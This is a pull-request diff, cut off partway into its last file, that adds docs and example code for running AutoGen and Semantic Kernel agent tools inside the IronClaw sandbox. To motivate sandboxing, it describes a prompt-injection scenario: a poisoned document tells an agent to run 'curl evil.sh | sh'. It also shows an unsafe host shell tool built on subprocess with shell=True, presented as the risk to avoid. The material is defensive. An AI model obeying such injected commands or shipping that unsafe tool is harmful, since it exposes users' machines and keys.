### PR TITLE
feat(integrations): AutoGen + Semantic Kernel sandboxed examples (IRO-385)

### DIFF
--- a/docs/integrations/.nav.yml
+++ b/docs/integrations/.nav.yml
@@ -9,6 +9,8 @@ nav:
   - CrewAI: crewai.md
   - LlamaIndex: llamaindex.md
   - Pydantic AI: pydantic-ai.md
+  - AutoGen: autogen.md
+  - Semantic Kernel: semantic-kernel.md
   - OpenAI Agents SDK: openai-sdk.md
   - Claude Agent SDK: claude-sdk.md
   - CI (GitHub Action): ci.md

--- a/docs/integrations/autogen.md
+++ b/docs/integrations/autogen.md
@@ -1,0 +1,147 @@
+---
+title: "Sandbox your AutoGen agent with IronClaw"
+description: How to sandbox a Microsoft AutoGen agent. Run your AutoGen AssistantAgent's untrusted tool and code execution inside IronClaw's sealed gVisor sandbox, with the model key held host-side and every tool call gated and audited, plus a credential-free way to see it work first.
+---
+
+# Sandbox your AutoGen agent with IronClaw
+
+You built an agent with **AutoGen** (Microsoft): an `AssistantAgent`, a model
+client, and a set of `FunctionTool`s the model can call — often a `run_shell` or a
+code executor so the agent can "just run it." That is a great way to design the
+*behavior*. The problem starts when it runs somewhere real: AutoGen's tool loop
+executes your functions **in your own process**, with your API key in memory and
+unrestricted outbound network. One prompt-injected instruction and that same
+process can read your environment, exfiltrate over the network, or run a command
+you never intended.
+
+IronClaw runs the same job behind a **sealed sandbox** instead: no network card,
+the model key held **host-side** and never in the agent, and every privileged tool
+call routed through a human-approval gateway and an audit log.
+
+!!! example "Runnable example"
+    A one-command AutoGen-to-IronClaw example lives at
+    [`examples/integrations/autogen`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/autogen):
+    an AutoGen `FunctionTool` (`sandboxed_shell`) whose commands run inside a real
+    IronClaw per-session sandbox, with a blocked escape attempt printed at the end.
+    It ships with the integration examples. The credential-free demo below runs the
+    same sealed loop today.
+
+## The two-shape fix
+
+There are two ways to sandbox an AutoGen agent, and you can use either.
+
+**1. Keep AutoGen, swap the tool.** Replace the host-executing tool you hand your
+`AssistantAgent` with one that runs every command inside an IronClaw sandbox. The
+agent plans tool calls exactly as before; only the execution moves into the box:
+
+```python
+from ironclaw_sandbox import IronClawSandbox
+from ironclaw_tool import make_sandbox_tool
+
+with IronClawSandbox() as sandbox:
+    tool = make_sandbox_tool(sandbox)          # a real AutoGen FunctionTool
+    agent = AssistantAgent("coder", model_client=..., tools=[tool])
+```
+
+That `sandboxed_shell` FunctionTool is a drop-in for a host `run_shell` tool: **no
+network, no host filesystem, no Docker socket**. The full adapter is ~15 lines —
+see [`ironclaw_tool.py`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/autogen/ironclaw_tool.py).
+
+**2. Re-declare the agent to IronClaw.** Or move the whole agent behind IronClaw
+and let the control-plane own the model key and the perimeter:
+
+```sh
+export OPENAI_API_KEY=sk-...   # host-side only; the sandbox never sees this key
+./bin/controlplane --dev --api-addr 127.0.0.1:8787 &
+ironctl agent create --name "Coder" --provider openai --model gpt-4o \
+  --instructions "Run the commands the user asks for." \
+  --tool read_file --tool write_file --yes
+```
+
+Same persona, same model, same tools, now behind a human-approval gateway and an
+audit log.
+
+## Why sandbox this
+
+A typical AutoGen agent hands the model a tool that shells out on your host:
+
+```python
+from autogen_agentchat.agents import AssistantAgent
+from autogen_core.tools import FunctionTool
+
+def run_shell(command: str) -> str:      # runs on YOUR box, with YOUR privileges
+    import subprocess
+    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout
+
+agent = AssistantAgent("coder", model_client=client, tools=[FunctionTool(run_shell, ...)])
+```
+
+Three things are true of that snippet, and all three are risks:
+
+1. **The key is in the process.** Anything that can read memory or `os.environ`
+   can read `sk-...`.
+2. **Tools run with your privileges.** `run_shell` executes on your box with your
+   filesystem and network. A poisoned document that says "run `curl evil.sh | sh`"
+   is a tool call away.
+3. **Egress is wide open.** The process can reach any host on the internet.
+
+IronClaw closes all three by construction, not by convention.
+
+## See it work first (no credentials)
+
+Watch the sealed loop run with the offline `mock` provider. No model key, no
+tokens, just Docker:
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+docker compose -f docker-compose.demo.yml up --build -d      # start the demo control-plane
+
+curl -s -X POST http://127.0.0.1:8787/v1/ui/chat/send \
+  -H 'authorization: Bearer ironclaw-demo' -H 'content-type: application/json' \
+  -d '{"agentGroupID":"mock-agent","text":"hello from autogen-land"}'
+
+sleep 3
+curl -s -H 'authorization: Bearer ironclaw-demo' \
+  http://127.0.0.1:8787/v1/ui/chat/mock-agent/messages       # the reply
+```
+
+You get the reply echoed back, proof that a real per-session sandbox launched and
+the answer flowed home through encrypted queues. Tear down with
+`docker compose -f docker-compose.demo.yml down`. The one-command, self-checking
+version is
+[`examples/integrations/autogen`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/autogen).
+
+## Port your AutoGen agent
+
+Map each part of the AutoGen agent onto an IronClaw agent group:
+
+| AutoGen | IronClaw | Notes |
+|---|---|---|
+| `OpenAIChatCompletionClient(model="gpt-4o")` | `--provider openai --model gpt-4o` | Any [provider](../providers/index.md): `anthropic`, `openai`, `gemini`, `local`, and more. |
+| `api_key=...` on the model client | `OPENAI_API_KEY` set **on the host** | The key is injected by the host model-proxy on the way out. It never enters the sandbox. |
+| `system_message=...` | `--identity` / `--soul` / `--instructions` | The agent's persona, voice, and operating rules. |
+| `FunctionTool`s (shell, code, ...) | `--tool <name>` (built-in) or an MCP server | Built-ins: `read_file`, `write_file`, `list_dir`, `web_search`, `http_fetch`. Your own tools attach over [MCP](../mcp.md). |
+| `agent.run(task=...)` | a message to the agent group | Same request/response, now through the sealed queue. |
+| AutoGen `RoundRobinGroupChat` / teams | multiple agent groups + host-mediated a2a | Agent-to-agent hand-off is host-routed and audited; spawning a new agent is gated. |
+
+Your AutoGen tools that are *not* built in attach as an [MCP server](../mcp.md):
+IronClaw registers them through the same human-approval gateway, so a new tool is a
+reviewed change, not a silent capability.
+
+## What you gained
+
+- **The key left the agent.** It lives host-side and is injected per request; a
+  compromised agent has nothing to steal.
+- **`network=none` by default.** The sandbox has no NIC. The only egress is the
+  audited model-proxy socket, plus whatever hosts you explicitly allowlist.
+- **Privileged actions are gated.** Registering a tool, spawning another agent, or
+  reaching a new host flows through a human-approval gateway and lands in the
+  [audit log](../architecture.md).
+
+Same agent you designed in AutoGen. A perimeter it never had.
+
+## Next
+
+- [Choose your model provider](../providers/index.md)
+- [MCP: bring your own tools](../mcp.md)
+- [Security and isolation](../security-isolation.md)

--- a/docs/integrations/index.md
+++ b/docs/integrations/index.md
@@ -1,6 +1,6 @@
 ---
 title: "Sandbox any AI agent framework with IronClaw"
-description: You built an agent with LangChain, CrewAI, LlamaIndex, Pydantic AI, the OpenAI Agents SDK, or the Claude Agent SDK. Those frameworks run your agent's tools and code in your own process, on your host. IronClaw runs the same agent inside a sealed gVisor sandbox instead. One search-intent guide per framework.
+description: You built an agent with LangChain, CrewAI, LlamaIndex, Pydantic AI, AutoGen, Semantic Kernel, the OpenAI Agents SDK, or the Claude Agent SDK. Those frameworks run your agent's tools and code in your own process, on your host. IronClaw runs the same agent inside a sealed gVisor sandbox instead. One search-intent guide per framework.
 ---
 
 # Sandbox any AI agent framework with IronClaw
@@ -11,8 +11,8 @@ matters the moment the agent runs somewhere real:
 
 **When your agent runs untrusted, model-chosen code, whose machine is it running on?**
 
-With LangChain, CrewAI, LlamaIndex, Pydantic AI, the OpenAI Agents SDK, and the
-Claude Agent SDK, the answer is the same: **yours**. The tool loop runs in your process, with your API key in
+With LangChain, CrewAI, LlamaIndex, Pydantic AI, AutoGen, Semantic Kernel, the
+OpenAI Agents SDK, and the Claude Agent SDK, the answer is the same: **yours**. The tool loop runs in your process, with your API key in
 memory, your filesystem, and unrestricted outbound network. A single prompt
 injection inside a document the agent reads can turn a `Bash` or `ShellTool` call
 into a shell on your box.
@@ -41,6 +41,8 @@ attack in [Isolation, proven](../security-isolation.md) and the
 | **CrewAI** | [Sandbox your CrewAI agents](crewai.md) |
 | **LlamaIndex** | [Sandbox your LlamaIndex agent](llamaindex.md) |
 | **Pydantic AI** | [Sandbox your Pydantic AI agent](pydantic-ai.md) |
+| **AutoGen** | [Sandbox your AutoGen agent](autogen.md) |
+| **Semantic Kernel** | [Sandbox your Semantic Kernel agent](semantic-kernel.md) |
 | **OpenAI Agents SDK** | [Sandbox your OpenAI Agents SDK agent](openai-sdk.md) |
 | **Claude Agent SDK** | [Sandbox your Claude Agent SDK agent](claude-sdk.md) |
 | **A CI pipeline** | [Run IronClaw in GitHub Actions](ci.md) |

--- a/docs/integrations/semantic-kernel.md
+++ b/docs/integrations/semantic-kernel.md
@@ -1,0 +1,148 @@
+---
+title: "Sandbox your Semantic Kernel agent with IronClaw"
+description: How to sandbox a Microsoft Semantic Kernel agent. Run your kernel's untrusted plugin and code execution inside IronClaw's sealed gVisor sandbox, with the model key held host-side and every function call gated and audited, plus a credential-free way to see it work first.
+---
+
+# Sandbox your Semantic Kernel agent with IronClaw
+
+You built an agent with **Semantic Kernel** (Microsoft): a `Kernel`, a chat
+service, and a set of plugins — native `@kernel_function`s the model can call,
+often a shell or code function so the agent can "just run it." That is a great way
+to design the *behavior*. The problem starts when it runs somewhere real: SK's
+function-calling loop executes your kernel functions **in your own process**, with
+your API key in memory and unrestricted outbound network. One prompt-injected
+instruction and that same process can read your environment, exfiltrate over the
+network, or run a command you never intended.
+
+IronClaw runs the same job behind a **sealed sandbox** instead: no network card,
+the model key held **host-side** and never in the agent, and every privileged
+function call routed through a human-approval gateway and an audit log.
+
+!!! example "Runnable example"
+    A one-command Semantic-Kernel-to-IronClaw example lives at
+    [`examples/integrations/semantic-kernel`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/semantic-kernel):
+    a native SK plugin (`sandboxed_shell`) whose commands run inside a real IronClaw
+    per-session sandbox, with a blocked escape attempt printed at the end. It ships
+    with the integration examples. The credential-free demo below runs the same
+    sealed loop today.
+
+## The two-shape fix
+
+There are two ways to sandbox a Semantic Kernel agent, and you can use either.
+
+**1. Keep the kernel, swap the plugin.** Replace the host-executing function you
+register with one that runs every command inside an IronClaw sandbox. The kernel
+plans the function calls exactly as before; only the execution moves into the box:
+
+```python
+from ironclaw_sandbox import IronClawSandbox
+from ironclaw_tool import make_sandbox_tool
+
+with IronClawSandbox() as sandbox:
+    plugin = make_sandbox_tool(sandbox)        # a real SK native plugin
+    kernel.add_plugin(plugin, plugin_name="ironclaw")
+```
+
+That plugin's `sandboxed_shell` `@kernel_function` is a drop-in for a host shell
+function: **no network, no host filesystem, no Docker socket**. The full adapter is
+~15 lines — see
+[`ironclaw_tool.py`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/semantic-kernel/ironclaw_tool.py).
+
+**2. Re-declare the agent to IronClaw.** Or move the whole agent behind IronClaw
+and let the control-plane own the model key and the perimeter:
+
+```sh
+export OPENAI_API_KEY=sk-...   # host-side only; the sandbox never sees this key
+./bin/controlplane --dev --api-addr 127.0.0.1:8787 &
+ironctl agent create --name "Coder" --provider openai --model gpt-4o \
+  --instructions "Run the commands the user asks for." \
+  --tool read_file --tool write_file --yes
+```
+
+Same persona, same model, same functions, now behind a human-approval gateway and
+an audit log.
+
+## Why sandbox this
+
+A typical Semantic Kernel plugin runs on your host with your privileges:
+
+```python
+from semantic_kernel.functions import kernel_function
+
+class ShellPlugin:
+    @kernel_function(name="run_shell")
+    def run_shell(self, command: str) -> str:    # runs on YOUR box, YOUR privileges
+        import subprocess
+        return subprocess.run(command, shell=True, capture_output=True, text=True).stdout
+
+kernel.add_plugin(ShellPlugin(), plugin_name="shell")
+```
+
+Three things are true of that snippet, and all three are risks:
+
+1. **The key is in the process.** Anything that can read memory or `os.environ`
+   can read `sk-...`.
+2. **Functions run with your privileges.** `run_shell` executes on your box with
+   your filesystem and network. A poisoned document that says "run
+   `curl evil.sh | sh`" is a function call away.
+3. **Egress is wide open.** The process can reach any host on the internet.
+
+IronClaw closes all three by construction, not by convention.
+
+## See it work first (no credentials)
+
+Watch the sealed loop run with the offline `mock` provider. No model key, no
+tokens, just Docker:
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+docker compose -f docker-compose.demo.yml up --build -d      # start the demo control-plane
+
+curl -s -X POST http://127.0.0.1:8787/v1/ui/chat/send \
+  -H 'authorization: Bearer ironclaw-demo' -H 'content-type: application/json' \
+  -d '{"agentGroupID":"mock-agent","text":"hello from kernel-land"}'
+
+sleep 3
+curl -s -H 'authorization: Bearer ironclaw-demo' \
+  http://127.0.0.1:8787/v1/ui/chat/mock-agent/messages       # the reply
+```
+
+You get the reply echoed back, proof that a real per-session sandbox launched and
+the answer flowed home through encrypted queues. Tear down with
+`docker compose -f docker-compose.demo.yml down`. The one-command, self-checking
+version is
+[`examples/integrations/semantic-kernel`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/semantic-kernel).
+
+## Port your Semantic Kernel agent
+
+Map each part of the kernel onto an IronClaw agent group:
+
+| Semantic Kernel | IronClaw | Notes |
+|---|---|---|
+| `OpenAIChatCompletion(ai_model_id="gpt-4o")` | `--provider openai --model gpt-4o` | Any [provider](../providers/index.md): `anthropic`, `openai`, `gemini`, `local`, and more. |
+| API key on the chat service | `OPENAI_API_KEY` set **on the host** | The key is injected by the host model-proxy on the way out. It never enters the sandbox. |
+| System prompt / persona | `--identity` / `--soul` / `--instructions` | The agent's persona, voice, and operating rules. |
+| Native plugins (`@kernel_function`) | `--tool <name>` (built-in) or an MCP server | Built-ins: `read_file`, `write_file`, `list_dir`, `web_search`, `http_fetch`. Your own functions attach over [MCP](../mcp.md). |
+| `kernel.invoke(...)` with `FunctionChoiceBehavior.Auto()` | a message to the agent group | Same request/response, now through the sealed queue. |
+
+Your kernel functions that are *not* built in attach as an
+[MCP server](../mcp.md): IronClaw registers them through the same human-approval
+gateway, so a new function is a reviewed change, not a silent capability.
+
+## What you gained
+
+- **The key left the agent.** It lives host-side and is injected per request; a
+  compromised agent has nothing to steal.
+- **`network=none` by default.** The sandbox has no NIC. The only egress is the
+  audited model-proxy socket, plus whatever hosts you explicitly allowlist.
+- **Privileged actions are gated.** Registering a function, spawning another agent,
+  or reaching a new host flows through a human-approval gateway and lands in the
+  [audit log](../architecture.md).
+
+Same agent you designed in Semantic Kernel. A perimeter it never had.
+
+## Next
+
+- [Choose your model provider](../providers/index.md)
+- [MCP: bring your own tools](../mcp.md)
+- [Security and isolation](../security-isolation.md)

--- a/examples/README.md
+++ b/examples/README.md
@@ -108,7 +108,8 @@ docker compose -f docker-compose.demo.yml down            # tear down
 
 ### Framework integrations
 
-Already using LangChain or CrewAI? [**`integrations/`**](integrations/) backs
+Already using LangChain, CrewAI, AutoGen, or Semantic Kernel?
+[**`integrations/`**](integrations/) backs
 your agent's untrusted code execution with a real IronClaw sandbox instead of a
 host shell — the same tool interface, none of the host risk. Each ships a
 one-command, zero-credential containment demo:
@@ -117,6 +118,8 @@ one-command, zero-credential containment demo:
 |-------------|---------------|:--------------------:|
 | [`integrations/langchain/`](integrations/langchain/) | A LangChain `StructuredTool` (`sandboxed_shell`) whose commands run inside an IronClaw per-session sandbox; benign code runs, every escape attempt is contained. | ✅ `run.sh` (self-contained) |
 | [`integrations/crewai/`](integrations/crewai/) | The same pattern as a CrewAI `BaseTool` for a crew agent. | ✅ `run.sh` (self-contained) |
+| [`integrations/autogen/`](integrations/autogen/) | The same pattern as an **AutoGen** `FunctionTool` for an `AssistantAgent`. | ✅ `run.sh` (self-contained) |
+| [`integrations/semantic-kernel/`](integrations/semantic-kernel/) | The same pattern as a **Semantic Kernel** native `@kernel_function` plugin. | ✅ `run.sh` (self-contained) |
 
 ## Prerequisites
 

--- a/examples/integrations/README.md
+++ b/examples/integrations/README.md
@@ -17,6 +17,8 @@ foot-gun for a boundary IronClaw [proves holds](../red-team-escape/).
 | [`crewai/`](crewai/) | [CrewAI](https://docs.crewai.com) | `examples/integrations/crewai/run.sh` |
 | [`llamaindex/`](llamaindex/) | [LlamaIndex](https://docs.llamaindex.ai) | `examples/integrations/llamaindex/run.sh` |
 | [`pydantic-ai/`](pydantic-ai/) | [Pydantic AI](https://ai.pydantic.dev) | `examples/integrations/pydantic-ai/run.sh` |
+| [`autogen/`](autogen/) | [AutoGen (Microsoft)](https://github.com/microsoft/autogen) | `examples/integrations/autogen/run.sh` |
+| [`semantic-kernel/`](semantic-kernel/) | [Semantic Kernel (Microsoft)](https://github.com/microsoft/semantic-kernel) | `examples/integrations/semantic-kernel/run.sh` |
 | [`openai-agents/`](openai-agents/) | [OpenAI Agents SDK](https://github.com/openai/openai-agents-python) | `examples/integrations/openai-agents/run.sh` |
 | [`claude-agent-sdk/`](claude-agent-sdk/) | [Claude Agent SDK](https://github.com/anthropics/claude-agent-sdk-python) | `examples/integrations/claude-agent-sdk/run.sh` |
 
@@ -33,7 +35,8 @@ key never enters the sandbox.
 The IronClaw-specific piece is one small, standard-library client that engages a
 per-session sandbox and runs commands inside it. The examples come in two shapes:
 
-- **Framework tools** (LangChain, CrewAI, LlamaIndex, Pydantic AI) wrap the shared
+- **Framework tools** (LangChain, CrewAI, LlamaIndex, Pydantic AI, AutoGen,
+  Semantic Kernel) wrap the shared
   [`_shared/ironclaw_sandbox.py`](_shared/ironclaw_sandbox.py) client as a native tool
   via a thin `ironclaw_tool.py` adapter (~15-20 lines):
 

--- a/examples/integrations/autogen/README.md
+++ b/examples/integrations/autogen/README.md
@@ -1,0 +1,68 @@
+# AutoGen agents, sandboxed by IronClaw
+
+Your **AutoGen** (Microsoft) agent runs untrusted, model-generated code. Point
+that execution at an **IronClaw sandbox** instead of your host and the same agent
+gets real code execution with **no network, no host filesystem, and no Docker
+socket** — the isolation boundary IronClaw [proves holds](../../red-team-escape/),
+not just promises.
+
+```python
+from ironclaw_sandbox import IronClawSandbox
+from ironclaw_tool import make_sandbox_tool
+
+with IronClawSandbox() as sandbox:            # engage a per-session sandbox
+    tool = make_sandbox_tool(sandbox)         # a real AutoGen FunctionTool
+    # agent = AssistantAgent("coder", model_client=..., tools=[tool])
+```
+
+The `sandboxed_shell` FunctionTool is a drop-in for the host-executing shell /
+code tool you would otherwise hand an `AssistantAgent`. The agent plans the tool
+calls exactly as before; only the execution moves into the box.
+
+## Try it in one command
+
+Zero credentials — the LLM side uses the offline **mock provider**, the sandbox
+is real:
+
+```sh
+examples/integrations/autogen/run.sh
+```
+
+It engages a live IronClaw per-session sandbox, drives the `sandboxed_shell`
+FunctionTool exactly as an `AssistantAgent`'s tool loop would
+(`tool.run_json({"command": ...})`), runs one benign task plus a battery of escape
+attempts, and prints a PASS/FAIL containment table:
+
+```
+  [OK ] benign task: run agent code                    ->  [exit 0] hello from inside the IronClaw sandbox uid=65532...
+  [OK ] network egress: only loopback exists           ->  [exit 0] lo
+  [OK ] network egress: DNS lookup of api.anthropic...  ->  [exit 0] NO_EGRESS
+  [OK ] host escape: Docker Engine socket is absent    ->  [exit 0] ABSENT
+  [OK ] host escape: host filesystem is not mounted    ->  [exit 0] CONTAINED
+
+RESULT: PASS -- benign code ran; every escape attempt was contained.
+```
+
+`run.sh --keep` leaves the demo running; `run.sh --attach` reuses an already-up
+demo control-plane.
+
+## Use a real LLM
+
+Set `OPENAI_API_KEY` (and uncomment `autogen-agentchat` + `autogen-ext[openai]` in
+[`requirements.txt`](requirements.txt)) and `run.sh` drives a real
+`AssistantAgent` instead of the scripted probes. The tool — and therefore the
+isolation — is identical.
+
+## How it works
+
+- [`ironclaw_sandbox.py`](../_shared/ironclaw_sandbox.py) — engages a per-session
+  IronClaw sandbox (`ic-sbx-*`) against the demo control-plane and runs commands
+  inside it as its own non-root uid (65532). Pure standard library.
+- [`ironclaw_tool.py`](ironclaw_tool.py) — wraps that sandbox as an AutoGen
+  `FunctionTool` named `sandboxed_shell`. **This is the ~15 lines you copy** to
+  swap a host shell tool for a sandboxed one.
+- [`run.py`](run.py) — engages the sandbox and drives the tool.
+
+The execution primitive is the same one IronClaw's red-team harness attacks: a
+`docker exec` into the live per-session sandbox as its non-root uid. See the
+repo root [`README`](../../../README.md) for the full isolation model.

--- a/examples/integrations/autogen/ironclaw_tool.py
+++ b/examples/integrations/autogen/ironclaw_tool.py
@@ -1,0 +1,46 @@
+"""AutoGen tool backed by an IronClaw sandbox.
+
+Drop-in replacement for the host-executing code/shell tools you would normally
+hand an AutoGen `AssistantAgent` (a `FunctionTool` wrapping a `run_shell`
+callable, a code-executor, ...): the agent calls it exactly the same way, but
+every command runs inside an isolated IronClaw per-session sandbox instead of on
+your machine.
+
+    from ironclaw_tool import make_sandbox_tool
+    from ironclaw_sandbox import IronClawSandbox
+
+    sandbox = IronClawSandbox().__enter__()
+    tool = make_sandbox_tool(sandbox)          # a real AutoGen FunctionTool
+    agent = AssistantAgent("coder", model_client=..., tools=[tool])
+"""
+
+from __future__ import annotations
+
+from autogen_core.tools import FunctionTool
+
+from ironclaw_sandbox import IronClawSandbox
+
+_DESCRIPTION = (
+    "Execute a shell command inside an isolated IronClaw sandbox and return its "
+    "stdout/stderr and exit code. Use this for any code the user asks you to run. "
+    "The sandbox has no network, no access to the host filesystem, and no Docker "
+    "socket, so it is safe to run untrusted commands."
+)
+
+
+def make_sandbox_tool(sandbox: IronClawSandbox) -> FunctionTool:
+    """Wrap a live IronClaw sandbox as an AutoGen FunctionTool.
+
+    The sandbox handle is captured in a closure so the tool is a plain callable
+    AutoGen can introspect and schedule, robust across autogen-core versions.
+    """
+
+    def sandboxed_shell(command: str) -> str:
+        """Run a shell command inside the IronClaw sandbox and return its output."""
+        return str(sandbox.run(command))
+
+    return FunctionTool(
+        sandboxed_shell,
+        name="sandboxed_shell",
+        description=_DESCRIPTION,
+    )

--- a/examples/integrations/autogen/requirements.txt
+++ b/examples/integrations/autogen/requirements.txt
@@ -1,0 +1,8 @@
+# The IronClaw sandbox client is pure standard library; the only dependency the
+# default credential-free path adds is AutoGen's core + tool layer. Floor-pinned
+# to the 0.4+ line where FunctionTool lives in autogen_core.tools.
+autogen-core>=0.4,<0.8
+
+# Optional -- only needed for the real-LLM path (set OPENAI_API_KEY):
+# autogen-agentchat>=0.4,<0.8
+# autogen-ext[openai]>=0.4,<0.8

--- a/examples/integrations/autogen/run.py
+++ b/examples/integrations/autogen/run.py
@@ -1,0 +1,82 @@
+#!/usr/bin/env python3
+"""Run an AutoGen agent whose code execution is backed by an IronClaw sandbox.
+
+Zero credentials by default: it engages a real IronClaw per-session sandbox
+against the offline demo control-plane (mock provider) and drives the AutoGen
+`sandboxed_shell` FunctionTool exactly as an `AssistantAgent` would -- one benign
+task plus a battery of escape attempts -- then prints a PASS/FAIL containment
+table.
+
+Set OPENAI_API_KEY to instead let a real LLM-driven AssistantAgent decide what to
+run; the tool (and therefore the isolation) is identical either way.
+"""
+
+from __future__ import annotations
+
+import asyncio
+import os
+import sys
+
+# Make the shared client + demo importable (examples/integrations/_shared).
+sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", "_shared"))
+
+from containment_demo import PROBES, run_containment_demo  # noqa: E402
+from ironclaw_sandbox import IronClawSandbox  # noqa: E402
+from ironclaw_tool import make_sandbox_tool  # noqa: E402
+
+
+def _invoke_tool(tool, command: str) -> str:
+    """Call the FunctionTool exactly as AutoGen's tool loop does: run_json + stringify."""
+    from autogen_core import CancellationToken
+
+    async def _call() -> str:
+        result = await tool.run_json({"command": command}, CancellationToken())
+        return tool.return_value_as_string(result)
+
+    return asyncio.run(_call())
+
+
+def drive_with_real_agent(tool) -> int:
+    """Optional: let a real LLM-driven AssistantAgent decide what to run (needs a key)."""
+    from autogen_agentchat.agents import AssistantAgent
+    from autogen_ext.models.openai import OpenAIChatCompletionClient
+
+    async def _run() -> None:
+        model_client = OpenAIChatCompletionClient(model="gpt-4o-mini")
+        agent = AssistantAgent(
+            "sandboxed_coder",
+            model_client=model_client,
+            tools=[tool],
+            system_message="Run commands with the sandboxed_shell tool to answer.",
+        )
+        result = await agent.run(
+            task="Run `id` and tell me which user the sandbox runs as."
+        )
+        print(result.messages[-1].content)
+        await model_client.close()
+
+    asyncio.run(_run())
+    return 0
+
+
+def main() -> int:
+    print("==> engaging an IronClaw per-session sandbox (mock provider, zero-cred)")
+    with IronClawSandbox() as sandbox:
+        print(f"    sandbox container: {sandbox.container}")
+        tool = make_sandbox_tool(sandbox)
+
+        if os.environ.get("OPENAI_API_KEY"):
+            print("==> OPENAI_API_KEY set: driving a real AssistantAgent")
+            return drive_with_real_agent(tool)
+
+        # Deterministic, zero-cred path: call the FunctionTool exactly as an
+        # AssistantAgent's tool loop does -- run_json({"command": ...}) -- per probe.
+        print(f"==> driving the '{tool.name}' tool over {len(PROBES)} agent commands")
+        return run_containment_demo(
+            lambda command: _invoke_tool(tool, command),
+            framework="AutoGen",
+        )
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/examples/integrations/autogen/run.sh
+++ b/examples/integrations/autogen/run.sh
@@ -1,0 +1,38 @@
+#!/usr/bin/env bash
+# AutoGen + IronClaw sandbox -- one-command demo.
+#
+# Brings up the offline demo control-plane (mock provider -- no model key, no
+# channel tokens), then runs an AutoGen agent whose `sandboxed_shell` FunctionTool
+# executes inside a real IronClaw per-session sandbox. It runs one benign task
+# and a battery of escape attempts and prints a PASS/FAIL containment table.
+#
+#   examples/integrations/autogen/run.sh           # build + up + demo + tear down
+#   examples/integrations/autogen/run.sh --keep     # leave the demo running
+#   examples/integrations/autogen/run.sh --attach   # use an already-running demo
+#
+# Env overrides (all optional):
+#   IRONCLAW_ADDR        control-plane base URL  (default http://127.0.0.1:8787)
+#   IRONCLAW_API_TOKEN   API bearer token        (default ironclaw-demo)
+#   IRONCLAW_DEMO_AGENT  agent group id          (default mock-agent)
+#   SKIP_BUILD=1         skip the sandbox image build (assume it exists)
+#   OPENAI_API_KEY       if set, drive a real LLM agent instead of the scripted one
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "$SCRIPT_DIR/../../.." && pwd)"
+source "$SCRIPT_DIR/../_shared/demo-lifecycle.sh"
+
+# AutoGen supports Python 3.10-3.12. Pick a compatible interpreter unless the
+# caller pinned one via PYTHON.
+if [ -z "${PYTHON:-}" ]; then
+  for cand in python3.12 python3.11 python3.10 python3; do
+    if command -v "$cand" >/dev/null 2>&1; then PYTHON="$cand"; break; fi
+  done
+  export PYTHON
+fi
+
+ensure_demo_up "$@"
+setup_venv "$SCRIPT_DIR"
+
+echo "==> running the AutoGen sandbox demo"
+python "$SCRIPT_DIR/run.py"

--- a/examples/integrations/semantic-kernel/README.md
+++ b/examples/integrations/semantic-kernel/README.md
@@ -1,0 +1,67 @@
+# Semantic Kernel agents, sandboxed by IronClaw
+
+Your **Semantic Kernel** (Microsoft) agent runs untrusted, model-generated code.
+Point that execution at an **IronClaw sandbox** instead of your host and the same
+agent gets real code execution with **no network, no host filesystem, and no
+Docker socket** — the isolation boundary IronClaw
+[proves holds](../../red-team-escape/), not just promises.
+
+```python
+from ironclaw_sandbox import IronClawSandbox
+from ironclaw_tool import make_sandbox_tool
+
+with IronClawSandbox() as sandbox:            # engage a per-session sandbox
+    plugin = make_sandbox_tool(sandbox)       # a real SK native plugin
+    # kernel.add_plugin(plugin, plugin_name="ironclaw")
+```
+
+The plugin exposes one `@kernel_function` named `sandboxed_shell` — a drop-in for
+the host-executing shell / code function you would otherwise register. The kernel
+plans the function calls exactly as before; only the execution moves into the box.
+
+## Try it in one command
+
+Zero credentials — the LLM side uses the offline **mock provider**, the sandbox
+is real:
+
+```sh
+examples/integrations/semantic-kernel/run.sh
+```
+
+It engages a live IronClaw per-session sandbox, drives the `sandboxed_shell`
+kernel function exactly as SK's function-calling loop would
+(`plugin.sandboxed_shell(command=...)`), runs one benign task plus a battery of
+escape attempts, and prints a PASS/FAIL containment table:
+
+```
+  [OK ] benign task: run agent code                    ->  [exit 0] hello from inside the IronClaw sandbox uid=65532...
+  [OK ] network egress: only loopback exists           ->  [exit 0] lo
+  [OK ] network egress: DNS lookup of api.anthropic...  ->  [exit 0] NO_EGRESS
+  [OK ] host escape: Docker Engine socket is absent    ->  [exit 0] ABSENT
+  [OK ] host escape: host filesystem is not mounted    ->  [exit 0] CONTAINED
+
+RESULT: PASS -- benign code ran; every escape attempt was contained.
+```
+
+`run.sh --keep` leaves the demo running; `run.sh --attach` reuses an already-up
+demo control-plane.
+
+## Use a real LLM
+
+Set `OPENAI_API_KEY` and `run.sh` drives a real kernel with
+`FunctionChoiceBehavior.Auto()` instead of the scripted probes — the model picks
+`sandboxed_shell` itself. The plugin — and therefore the isolation — is identical.
+
+## How it works
+
+- [`ironclaw_sandbox.py`](../_shared/ironclaw_sandbox.py) — engages a per-session
+  IronClaw sandbox (`ic-sbx-*`) against the demo control-plane and runs commands
+  inside it as its own non-root uid (65532). Pure standard library.
+- [`ironclaw_tool.py`](ironclaw_tool.py) — wraps that sandbox as a Semantic Kernel
+  native plugin whose `sandboxed_shell` `@kernel_function` runs in the box. **This
+  is the ~15 lines you copy** to swap a host shell function for a sandboxed one.
+- [`run.py`](run.py) — engages the sandbox and drives the function.
+
+The execution primitive is the same one IronClaw's red-team harness attacks: a
+`docker exec` into the live per-session sandbox as its non-root uid. See the
+repo root [`README`](../../../README.md) for the full isolation model.

--- a/examples/integrations/semantic-kernel/ironclaw_tool.py
+++ b/examples/integrations/semantic-kernel/ironclaw_tool.py
@@ -1,0 +1,45 @@
+"""Semantic Kernel plugin backed by an IronClaw sandbox.
+
+Drop-in replacement for the host-executing code/shell function you would normally
+expose to a **Semantic Kernel** agent (a native `@kernel_function` that shells
